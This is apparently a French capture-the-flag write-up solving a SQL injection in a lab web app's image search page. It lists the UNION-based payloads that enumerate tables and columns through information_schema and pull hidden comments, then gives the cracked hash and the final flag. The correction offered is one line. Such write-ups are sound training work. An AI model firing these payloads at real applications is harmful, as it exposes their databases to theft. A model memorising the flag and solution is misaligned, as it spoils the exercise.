# Resolve

## Lien
http://10.11.200.162/?page=searchimg

## Explication de la faille

Pour chercher ou est stocke la table:
`ID: 1 AND 1=2 UNION SELECT table_schema, table_name FROM information_schema.tables `
Resultat:
- Member_images
- list_images

Chercher les colonnes de la table:
`1 AND 1=2 UNION SELECT  table_name, column_name FROM information_schema.columns`
list_images:
- id
- url
- title
- comment

On lance plusieurs injection sur la table list_images jusqu'a trouve la bonne qui est celle-ci:
`1 or 1=2 UNION SELECT id, comment FROM list_images`

Resultat:
```
id: 5
comment: If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46
```

Pour obtenir le flag:
```
1928e8083cf461a51303633093573c46 en md5 signifie: albatroz
sha256 -> f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
```

## Correction
Bloquer les injections SQL.
